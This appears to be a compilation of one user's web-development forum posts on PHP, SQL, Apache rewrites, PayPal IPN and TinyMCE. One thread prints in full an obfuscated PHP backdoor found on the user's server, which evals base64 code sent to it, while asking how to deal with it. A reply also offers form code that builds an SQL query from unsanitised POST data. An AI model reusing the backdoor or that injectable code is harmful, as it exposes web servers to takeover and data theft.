It just got a bit more odd ...

So, I decided to header('Location: page.php') in the hope that requesting the page anew would solve the problem. It didn't. I had to refresh again (?!) to get the correct result.

Then ... I put it on my external server to show someone what was happening and it worked as expected on that server.

I haven't tried my original approach (including data.php twice) on the external server as I'm confused enough already and the issue is solved in a functional sense - I can hand the page over to the user as is.

But I still want to know what/why/how did this happen (it's definately bothering me that I don't understand this) so I'll leave this open for a bit in case anyone has any pointers.

Thanks to all for your help.

The array is created when data.php is included - the array is the data in that file. Yes, that unset was a bit of a long shot.

Thanks for taking a look diafol.

I didn't lay out all of the code hoping that there was an obvious and glaring mistake with the general principle that I had adopted.

So, here's the add function ($the_file is products.php):

function add_product($the_file) {
    $result = "<?php\n";
    $name = htmlentities($_POST['new_name'], ENT_QUOTES, 'UTF-8');
    $unit_price = htmlentities($_POST['new_unit_price'], ENT_QUOTES, 'UTF-8');
    $image = htmlentities($_POST['new_image'], ENT_QUOTES, 'UTF-8');
    $description = htmlentities($_POST['new_description'], ENT_QUOTES, 'UTF-8');
    $result .=  '$' . "product_array[0]['name'] = '$name';\n";
    $result .=  '$' . "product_array[0]['unit_price'] = '$unit_price';\n";
    $result .=  '$' . "product_array[0]['image'] = '$image';\n";
    $result .=  '$' . "product_array[0]['description'] = '$description';\n\n";
    include 'includes/products.php';
    $i = 1;
    foreach ($product_array as $product) {
        $name = $product['name'];
        $unit_price = $product['unit_price'];
        $image = $product['image'];
        $description = $product['description'];
        $result .=  '$product_array[' . $i . "]['name'] = '$name';\n";
        $result .=  '$product_array[' . $i . "]['unit_price'] = '$unit_price';\n";
        $result .=  '$product_array[' . $i . "]['image'] = '$image';\n";
        $result .=  '$product_array[' . $i++ . "]['description'] = '$description';\n\n";
    }
    unset($product_array);
    $result .= "?>\n";
    $file_handle = fopen($the_file, "w") or die("Unable to open file!");
    fwrite($file_handle, $result);
    fclose($file_handle);
    $_SESSION['added'] = true;
    $add_result = '<div id="add_result">Product added.</div>';
    return $add_result;
}

Thanks again for any help.

Two files to edit/maintain a data array.
data.php looks something like this:

<?php

$data_array[0]['key1'] = 'value';
$data_array[0]['key2'] = 'value';

$data_array[1]['key1'] = 'value';
$data_array[1]['key2'] = 'value';

$data_array[2]['key1'] = 'value';
$data_array[2]['key2'] = 'value';

?>

admin.php works something like this:

function get_data() {
    include 'data.php';
    // do a load of stuff with $data_array to create an HTML form
    // so that the user can edit it.
    return $html_form;
}

function add_record() {
    include 'data.php';
    // read the POST data and format it into a string
    // read $data_array into a string and append that string the POST data string
    // write string back to data.php overwriting the contents
    return $result;
}

function edit_record() {
    // read the POST data and format it into a string (except where a record is marked for deletion)
    // write string back to data.php overwriting the contents
    return $result;
}

if ($_POST['submit'] == 'add record') {
    echo add_record();
}
if ($_POST['submit'] == 'edit record') {
    echo edit_record();
}
echo get_data();

When I simply open the page everything works as expected. I can see all of the correct data in the form.

If I edit the data it all loads properly, complete with the new data and deleted records have gone.

However, if I add a new record then $data_array does not load properly - it loads the last version without the new record. If I look at the file I find that it has been updated. If I reload the page I will see the correct data.

The ...

I have a plug-in for a payment gateway for a WordPress installation with a WooCommerce shopping plug-in.

The payment gateway plug-in fails at the checkout. The error message may be a distraction at this point as I only want some more general advice. The error is suggesting some problem with the CGI configuration.

The support people for the plug-in have suggested the following:

1) CGI request and response must be uploaded in binary mode

2) CGI request and response must be executable (755)

3) CGI request and response must be in the right version (32/64bits, static/glib, prefer 64bits static)

4) Paths to CGI request and response must be right

Okay - 1 and two I can deal with.

Here's my questions: What does 3 mean and how do I find out the version I'm running? Does 4 simply mean the path to the cgi-bin?

I will ask these questions of the support people but I wanted to investigate first - I am embarrassed at my lack of success finding anything using Google!

Yes, sorry about one and three looking the same ... I can't figure out how to get the inline code editor to display properly - here's three again:

SELECT detail FROM options WHERE `option` = 'site name'

Hello,

I am getting a bit confused regarding apostrophes in my SQL statement. I can get it to work but I would like to understand why it works when it does or, conversely, why it doesn't work when it doesn't. If you know what I mean. Anyway - here goes:

This doesn't work and it produces an error:

SELECT detail FROM options WHERE option = 'site name'

This doesn't work but simply returns an empty data set:

SELECT detail FROM options WHERE 'option' = 'site name'

This does work:

SELECT detail FROM options WHERE option = 'site name'

I am having trouble getting the correct apostrophe into the above code - option should be encased in the same apostrophe that seems to delineate inline code and I can't figure out how to escape it.

As you can see the difference is all about the apostrophes.

Any explanation would be most welcome, thank you.

Simon.

This is just me trying to figure out how to escape the apostrophe:
SELECT detail FROM options WHERE ``option`` = 'site name'

Hi, Diafol,

Thanks for that link. It helped in so much as it gave me a slightly different formula to get the same result and most helpfully, for my confidence in what I'm doing, it confirmed to me that I was on the right track in respect of the procedure that I'm using.

Unfortunately, using the code on the page produced the same problem.

Thanks anyway, I appreciate the effort you have taken,

Simon.

So, I'm guessing that it should be: AuthUserFile "/home/machiahd/public_html/passwd/.htpasswds

However, if you want to be sure of the path, create a file called path.php and put this in it:<?phpecho realpath("path.php"); ?>

Upload it so that it is in the same directory as your .htpasswds file and then browse to it. You will see the necessary path detail. You will need to remove path.php from the string before you use it of course.

hope this helps,

Simon.
`

I believe that it should look something like this:

$my_conn = new mysqli('localhost', 'user name', 'password', 'database name');
$sql = "SELECT * FROM messages";
$result = $my_conn->query($sql);
while ($obj = $result->fetch_object()) {
    echo = $obj->message;
}

I could easily be wrong though ...

hope this helps,

Simon.

AuthUserFile "/home/machiner/.htpasswds/public_html/passwd looks a bit iffy to me (I could be wrong, very easily!). Should it beAuthUserFile "/home/machiner/public_html/passwd/.htpasswds perhaps?

Hi Everybody,

I hope someone can help with this, it's taken so long to get this close but I just can't figure out the last small (but show stopping) detail.

I start with a string of text and a font-face entered/selected via a form. I am using imagettfbbox to determine the overall dimensions and the descent (height below the baseline) value of the string using the selected font.

Then I create an image using those dimensions and create the same text in that image using the same font (again, using imagettfbbox).

I position the imagettfbbox at x = 0 and y = overall height minus the descent value (I believe that that is how I calculate the baseline position of the string).

The goal is to create an image with all of the string visible but with no extra white space. It almost works.

I have found one character (so far) that has a problem with height using a normal font (ยง).

I have found several characters that cause a problem depending on whether I use a normal, italic or bold.

These characters seem to be cut off in the x axis if they are at the beginning or at the end of the string.

I'm guessing that I'm making a mistake somewhere when I calculate the dimension/descent.

You can see the output here: Click Here

Here is the code for the form page:

<?php
// Path to fonts (this will need to be changed to reflect the host environment) ...
diafol commented: Good question +14

JorgeM ... well that worked! thank you so much.

ellana980 ... that's what I thought it should be but it didn't work.

Thank you both of you.

Simon.

JorgeM, thank you so much for your help with this ... I will try out this code first thing tomorrow.

cheers,

Simon.

Thanks JorgeM ... this was so close! If I use your code the index.php page does return but the $_GET['page'] variable returns 'index.php' and the link for the CSS file referenced in the page head fails to load ... getting closer all the time though! thanks for your help.

Try this, it processes everything before updating the database:

<?php
// Set your variables to empty if they haven't been submitted:
if (isset($_POST['First_Name'])) {
    $First_Name = $_POST['First_Name'];
} else {
    $First_Name = '';
}
if (isset($_POST['Last_Name'])) {
    $Last_Name = $_POST['Last_Name'];
} else {
    $Last_Name = '';
}

if (isset($_POST['Email'])) {
    $Email = $_POST['Email'];
} else {
    $Email = '';
}
if (isset($_POST['Code'])) {
    $Code = $_POST['Code'];
} else {
    $Code = '';
}
if (isset($_POST['Phone'])) {
    $Phone = $_POST['Phone'];
} else {
    $Phone = '';
}
// Create message variables:
$outputMessage = '';
$errorMessage = '';
// Check if submit clicked:
if (isset($_POST['submit'])) {
    // Check fields are filled in:
    if (empty($First_Name)) {
        $errorMessage .= "<li>You forgot to enter your First Name</li>";
    }
    if (empty($Last_Name)) {
        $errorMessage .= "<li>You forgot to enter your Last Name</li>";
    }
    if (empty($Email)) {
        $errorMessage .= "<li>You forgot to enter your Email</li>";
    }
    if (empty($Code)) {
        $errorMessage .= "<li>You forgot to enter your Wowcher code you silly person!</li>";
    }
    if (empty($Phone)) {
        $errorMessage .= "<li>ou forgot to enter your Phone Number</li>";
    }
    // Check for error
    if (empty($errorMessage)) {
        // No error, do your database thing:
        mysql_connect ("localhost", "root", "root") or die ('Error: ' . mysql_error());
        mysql_select_db ("wowcher") or die ('Error: ' . mysql_error());
        $query="INSERT INTO wowcher_code(First_name, Last_Name, Email, Code, Telephone)VALUES ('".$First_name."', '".$Last_Name."', '".$Email."', '".$Code."', '".$Phone."')";
        mysql_query($query) or die ('Error updating database because: '.mysql_error());
        mysql_close();
        // Empty the variables and set output message:
         $First_Name = '';
         $Last_Name = '';
         $Email = '';
         $Code = ''; ...

Hi, thanks for looking at this post.

I have searched and experimented and after hours of getting really close I have finally admitted to my self that I'm going to have to stop and ask directions!

So, I want the browser address http://drivingmeinsane/Join to be re-written to http://drivingmeinsane/?page=Join

I've come really close ... here's my best effort:

Options +FollowSymlinks
RewriteEngine on
RewriteBase /
RewriteRule ^(Join|Sponsor|Contact)/?$ ?page=$1

Two problems:

1) (Join Us|Sponsor Us|Contact Us) does not work.
2) I don't really want to list all of the possible variables because it will be a dynamic list that can change.

I have tried replacing (Join Us|Sponsor Us|Contact Us) with all sorts, for example (.*) but to no avail.

Can anyone help please?

Thanks,

Simon.

almostbob commented: Does the heart good, to see somebody do the work and then ask for help, instead of just ask do it for me +12

I shed blood sweat and tears writing mail scripts (it's usually something to do with the boundaries or new line characters) until I found this: http://code.google.com/a/apache-extras.org/p/phpmailer/wiki/PHPMailer?tm=6

I have created a customised shopping cart coded in PHP. Once the user has filled their cart they hit checkout and all of the details, including the address detail, are posted into a PayPal shopping cart and the user can pay using a PayPal account or a credit card.

After the user has paid, PayPal re-directs (and here's the problem - see below) the user back a page on my site. This page conducts a brief to and fro with the PayPal server and, providing everything matches properly, a PDF invoice is emailed to the customer, a despatch note to the store guy and a copy invoice goes to the accounts office.

The problem: If the customer fails to return from the PayPal site then none of the order processing takes place. There are a few factors that may prevent the customer returning to the site and I need to factor this possibility in.

So, my question is, can someone tell me if I use the PayPal IPN system will it send a message to my web server 'listening' page even if the customer doesn't return to the site?

Thanks for your time,

Simon.

Bit of a long shot ... what happens if you set the header location to http//www.website.com/$url ?

Sorted ... I was looking in the wrong place!

Hi All,

I have inherited a web site which is really a bit beyond me ... there's no option though, I've got to figure it out, so ...

The whole site uses Apache/Python/Django/Satchmo. I want to set up a sub-domain which uses a simple Apache/PHP set up.

I'm guessing that I need to add a virtual host to take care of this configuration. Only thing is, the current virtual host set up is causing me concern because I don't properly understand it and I don't want to break it.

It's the *:80 that's particularly bothering me - I get the feeling that if I put another virtual host section in then it will not read it because it's already dealt with it in the section detailed below? At the moment, if I go to subdomain.mydomain.co.uk then I get the same pages as if I had simply gone to mydomain.co.uk.

I am reluctant to experiment without being a little more sure of the outcome because this is on a live server and I cannot duplicate it on a development server (yet).

Here's the current code:

[CODE]<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName www.mydomain.co.uk

Redirect permanent /pure http://myotherdomain.com/pure

WSGIDaemonProcess simon
WSGIScriptAlias / /home/simondev/projects/mydomain/apache/django.wsgi

<Directory /home/simondev/projects/mydomain/apache>
    Order deny,allow
    Allow from all
</Directory>

Alias /media/   /home/simondev/projects/mydomain/media/
Alias /static/  /home/simondev/projects/mydomain/static/ 

<Directory /home/simondev/projects/mydomain/media>
    Order deny,allow
    Allow from all
</Directory>

<Directory /home/simondev/projects/mydomain/static>
    Order deny,allow
    Allow from all
</Directory>

ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog /var/log/apache2/access.log combined

[/CODE] ...

[QUOTE=cereal;1775690]Hi, that is not sufficient, there are many ways to attack a PHP application you may want to read more about this subject here:

You must check server logs and application logs, review firewall rules, check if there are new processes. You can also try to search more info about this script by searching [icode]ppZiAAS8dDJF9Q*(#_+@#TWyJ[/icode], it seems this string is in common with other versions of the same script. Bye.[/QUOTE]

Thanks again cereal ... I shall mark this as resolved and start reading those pages ... there's an awful lot there!

thanks,

Simon.

[QUOTE=Karthik_pranas;1774813]mark this thread as solved if your problem solved[/QUOTE]

Hi Karthik_pranas,

Not sure if it is solved yet ... I'm still wondering if I'm doing enough to sanitise any inputs and, if I'm not, could this have been the route a malicious user might have used to upload this file?

I will keep my eye on this and I will mark as solved if/when it is. Thanks for the reminder.

Simon.

Thanks cereal - Wow ... who'd have thought that it meant all that?!

So, I'm guessing that if a browser looked at this file then it will email [email]air@example.com[/email] or contact [url]http://www.ya.ru/[/url] with some data depending on the GET/POST fields?

I don't understand how this file got there.

I do 'sanitise' any GET/POST fields that I use as follows:
[CODE]function sanitise($input){
if (get_magic_quotes_gpc()) {
$input = stripslashes($input);
}
return htmlentities($input, ENT_QUOTES);
}
[/CODE]

Is this good enough?

thanks for your help,

Simon.

I found a file called 4be7.php in the root of my web site.

I guess my first worry is how did it get there? Well, I've changed my FTP log on, what else can I do?

Secondly, what is it? Here's what's in it:

[CODE]<?php //176e622a9e272282a4a56a9100f5b75d
$=
//ppZiAAS8dDJF9Q*(#
+@#TWyJ
'Ci8qKgogKiBAdmVyc2lvbiAyLjYKICoKICovCmlmIChpc3NldCgkX1BPU1RbImFjdGlvbiJdKSkKewogICAgICAgIHN3aXRjaCAoJF9QT1NUWyJhY3Rpb24iXSkKICAgICAgICB7CiAgICAgICAgICAgICAgICBjYXNlICJ0ZXN0IjoKICAgICAgICAgICAgICAgICAgICAgICAgdGVzdCgpOwogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgIGNhc2UgInJlZ3VsYXJfdGVzdCI6CiAgICAgICAgICAgICAgICAgICAgICAgIHJlZ3VsYXJfdGVzdCgpOwogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgIGNhc2UgIm1haWwiOgogICAgICAgICAgICAgICAgICAgICAgICBzZW5kKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgZGVmYXVsdDoKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgICAgIHJldHVybjsKfQoKaWYgKGNvdW50KCRfR0VUKSA+IDApCnsKICAgICAgICBmb3JlYWNoICgkX0dFVCBhcyAkaWQgPT4gJGNvZGUpCiAgICAgICAgewogICAgICAgICAgICAgICAgaWYgKCRpZCA9PSAiaWQiKQogICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAkY29kZSgpOwogICAgICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICByZXR1cm47Cn0KCmZ1bmN0aW9uIHRlc3QoKQp7CiAgICAgICAgJGVuY29kZWRfZGF0YSA9ICIiOwoKICAgICAgICAkZGF0YVsidmVyc2lvbiJdID0gcGhwdmVyc2lvbigpOwogICAgICAgIGlmIChpc3NldCgkX1NFUlZFUlsiU0VSVkVSX1NPRlRXQVJFIl0pKQogICAgICAgIHsKICAgICAgICAgICAgICAgICRkYXRhWyJzZXJ2ZXJhcGkiXSA9ICRfU0VSVkVSWyJTRVJWRVJfU09GVFdBUkUiXTsKICAgICAgICB9CiAgICAgICAgZWxzZQogICAgICAgIHsKICAgICAgICAgICAgICAgICRkYXRhWyJzZXJ2ZXJhcGkiXSA9ICJOb3QgQXZhaWxhYmxlIjsKICAgICAgICB9CiAgICAgICAgb2Jfc3RhcnQoKTsKICAgICAgICBwaHBpbmZvKDgpOwogICAgICAgICRkYXRhWyJtb2R1bGVzIl0gPSBvYl9nZXRfY29udGVudHMoKTsKICAgICAgICBvYl9jbGVhbigpOwogICAgICAgICRkYXRhWyJleHRfY29ubmVjdCJdID0gZm9wZW4oImh0dHA6Ly93d3cueWEucnUvIiwgInIiKSA/IFRSVUUgOiBGQUxTRTsKICAgICAgICAkc2VyaWFsaXplc19kYXRhID0gc2VyaWFsaXplKCRkYXRhKTsKICAgICAgICAkZW5jb2RlZF9kYXRhID0gYmFzZTY0X2VuY29kZSgkc2VyaWFsaXplc19kYXRhKTsKICAgICAgICBlY2hvICRfUE9TVFsidGVzdF9tZXNzYWdlIl0gLiAkZW5jb2RlZF9kYXRhOwp9CgpmdW5jdGlvbiByZWd1bGFyX3Rlc3QoKQp7CgogICAgICAgICR0byA9ICJhaXJAZXhhbXBsZS5jb20iOwogICAgICAgICRzdWJqID0gIlNVQkohIjsKICAgICAgICAkbWVzc2FnZSA9ICJFSExPIjsKICAgICAgICAkcmVzID0gbWFpbCgkdG8sJHN1YmosJG1lc3NhZ2UpOwogICAgICAgIGlmKCRyZXMpCiAgICAgICAgewogICAgICAgICAgICBlY2hvICRfUE9TVFsidGVzdF9tZXNzYWdlIl07CiAgICAgICAgfQogICAgICAgIGVsc2UKICAgICAgICB7CiAgICAgICAgICAgIGVjaG8gc3RycmV2KCRfUE9TVFsidGVzdF9tZXNzYWdlIl0pOwogICAgICAgIH0KfQoKZnVuY3Rpb24gc2VuZCgpCnsKICAgICAgICAkY29kZSA9IGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJwcm9qZWN0Y29kZSJdKTsKCiAgICAgICAgZXZhbCgkY29kZSk7CiAgICAgICAgLy9yZXR1cm47Cn0K';
//ppZiAAS8dDJF9Q*(#+@#TWyJ
$ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$
= "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($_($));[/CODE]

I have searched on the internet but all pages I've found so far referring to any of this code result in the site trying to download some internet nasty or another on my PC so I'm guessing this is bad stuff!

Any advice welcome.

S.

[QUOTE=twiss;1567627]What you could do is have a shadow form, something like this:
[code=HTML]

[/code]
And then, if you click the preview button, write a script that puts the contents of you real form into this one and submit it.
Edit: perhaps it's better if you use target="preview", so that if you click preview again, it comes in the same window.[/QUOTE]

This is where it all started for me Twiss .... I wrote two forms and filled one with hidden fields which mirrored the fields available to the user.

This form would submit to a pop up and the user facing form would post to the appropriate action page in the main window.

I used onchange to keep the hidden fileds in sync with the user facing ones. That's when I discovered that onchange didn't work for the TinyMce textareas.

A little bit of research on TinyMce and I found function that went in the tinyMCE.init which updated as required just like the onchange script that I had written.

Only thing is, it was very unreliable, sometimes it worked sometimes it didn't and the editor was often very buggy.

Hence the conclusion that I will have to use the same form for preview as well as save and I will have submit it to get a reliable result from those TinyMce textareas (there's up to four on a page).

Ah well ... I'm going to wrap it up for the ...

[QUOTE=almostbob;1566925]popup windows dont work, too many have them blocked by default, layers in the current window operate without being blocked,

like the kudos window above right on this post

Boy is that obvious :P[/QUOTE]

Luckily, only two people will be using this page and they will be allowing popups ...

Unfortunately, I can't use your marvelous solution for this one(but I will be using it elsewhere thanks very much!).

For all sorts of reasons, I have to go to a different page to display the preview - it just would not work in the same page as the edit/save routine.

A pop up would be a most elegant solution but if I can't do that then I'm going to have to do it all server side by passing the variables from page to page as we go.

I'm going to stick at it for a bit ... as ever, all comments/advice most welcome.

Now, I know I'm gonna be red faced for asking this but I reckon I'd be more stupid if I didn't ask a question when I don't understand something, so, ... kudos window ... ? ... what kudos window? :-)

thanks,

Simon.

[QUOTE=twiss;1566910]Perhaps this helps: [url]http://tinymce.moxiecode.com/wiki.php/How-to_load/save_with_Ajax_in_TinyMCE[/url][/QUOTE]

I checked it out .... I could not figure it out Twiss, but thank you all the same ... I get the impression that this would do what I want it to but I don't really understand it .... I am a PHP'er and very new to JavaScript.